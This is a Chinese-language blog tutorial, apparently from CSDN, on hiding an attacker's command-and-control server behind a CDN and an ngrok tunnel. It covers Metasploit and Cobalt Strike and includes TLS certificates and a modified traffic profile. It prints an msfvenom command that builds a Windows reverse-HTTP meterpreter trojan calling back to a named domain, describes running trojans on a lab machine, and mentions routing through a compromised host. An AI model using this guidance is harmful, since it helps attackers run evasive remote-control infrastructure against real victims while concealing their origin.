目录
概述
域名上线原理
A 记录: 将域名指向一个 IPv4 地址(例如: 100.100.100.100 ),需要增加 A 记录CNAME 记录: 如果将域名指向一个域名,实现与被指向域名相同的访问效果,需要增加 CNAME 记录。这个域名一般是主机服务商提供的一个域名MX 记录: 建立电子邮箱服务,将指向邮件服务器地址,需要设置 MX 记录。建立邮箱时,一般会根据邮箱服务商提供的 MX 记录填写此记录NS 记录: 域名解析服务器记录,如果要将子域名指定某个域名服务器来解析,需要设置 NS 记录TXT 记录: 可任意填写,可为空。一般做一些验证记录时会使用此项,如:做 SPF (反垃圾邮件)记录AAAA 记录: 将主机名(或域名)指向一个 IPv6 地址(例如: ff03:0:0:0:0:0:0:c1 ),需要添加 AAAA 记录
CDN简介
![](https://img-blog.csdnimg.cn/fcb26e1d1be44f9aa3319e9a6673dae3.png)
CDN上线具体实现
Metasploit域名上线隐藏IP(CDN)
这里cs服务器使用的是公网带域名服务器
靶机用的是虚拟机windows10
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=www.nsxt.world LPORT=2095 -f exe >shell.exe
首先先使用msf生成木马
进入监听模块
设置payload 类型为刚刚生成木马文件的类型
设置监听地址为刚刚生成木马文件的lhost
设置监听地址为刚刚生成木马文件的lport
exploit -j 挂载到后台运行
我们这个时候在windows中执行木马 vps中就会得到反馈
我们使用wireshark进行抓包 发现 vps走的104.21.79.82 也就是CND的ip
CobaltStrike上线隐藏IP
CobaltStrike隐藏ip(CDN)
我们启动服务端
注意因为CDN不支持50050或者10010 所以只能填写公网ip不能填写域名
如果是正常腾讯云DNS解析 那么我们就可以使用域名去填写
新建一个CDN监视器 监视器里面我们就可以填写域名 不用填写ip地址了
http端口要设置为CND 支持的http端口!否则通过域名监听不到
创建一个无阶段木马
把无解段木马发送到虚拟机windows10 并且运行
这时我们就得到了windows权限
我们查看以列表形式展示的对话
发现 靶机ip时172.23.19.129 服务器连接的ip为172.71.155.46 这就代表成功隐藏了公网ip 路线走的是CDN ip 达到了隐藏ip效果
发送sleep 0
使用wirshark进行抓包
追踪 数据流http(很明显的特征是cs cookie传参)host为www.nsxt.world
流量分析 观察流量信息会发现全程和CDN在做通信
CobaltStrike隐藏ip(隧道转发代理)
使用说明 https://dashboard.ngrok.com/get-started/setup
下载ngrok 压缩文件 ->解压 ->修改ngrok权限-> 修改授权令牌
![](https://img-blog.csdnimg.cn/86faf72f2b86434991e28b71d7ee42cb.png)
生成无阶段木马 并在靶机上运行
运行后事件日志里就可以看到 靶机上线了
并且发现他们的与cs服务端连接的地址是127.0.0.1 也就是本地地址 也就代表走的本地ngrok的地址
抓取数据包 10.194.28.88 为我们运行木马的ip地址
这个 10.194.28.88 和18.177.76.42 持续连接
打开这个数据包发现 18.177.76.42 就是 0.tcp.jp.ngrok.io地址
隐藏ip成功
![](https://img-blog.csdnimg.cn/da52ed47d6064fe9bc3995debf96b5f0.png)
设置监听器
生成无阶段木马 在自己本机中执行 并不是靶机执行
执行后在cs上就能得到反馈
并且发现 运行木马的机器ip为10.194.28.88
连接的ip是 124.93.196.28 这个ip就是肉鸡172.23.19.153出网ip
隐藏cs流量
因为我们的vps域名是通过CDN上线的 所以我们要到官网上生成证书以及私钥复制证书创建txt导入,修改文件名为xxxx.pem复制私钥创建txt导入,修改文件名为xxxx.key 将创建的pem和key文件上传至云服务器。执行以下命令(www.xxx.com为申请的域名)
openssl pkcs12 -export -in xxxx.pem -inkey xxxx.key -out www.xxx.com.p12 -name www.xxx.com -passout pass:123456
keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore www.xxx.com.store -srckeystore www.xxx.com.p12 -srcstoretype PKCS12 -srcstorepass 123456 -alias www.xxx.com
把证书保存到 www.nsxt.world.pem
把私钥保存到www.nsxt.world.key
修改刚刚下载好的4.4配置文件
修改七个内容
3个 clien 3个server 1个账户密码
把修改好的配置文件拖拽到vps cs4.4目录里 使用 自带的c2lint 进行检查 首先要修改权限
设置监听器 上线端口要修改为CDN能接受的http端口
生成无阶段木马 运行木马文件后 等的时间有点长 耐心等待 就会得到权限
上图显示与10.194.28.88连接的ip是 172.69.22.63/172.69.134.197/172.69.134.196
我们进行抓包 发现与本机10.194.28.88通信的是 104.21.79.82 也就是CDN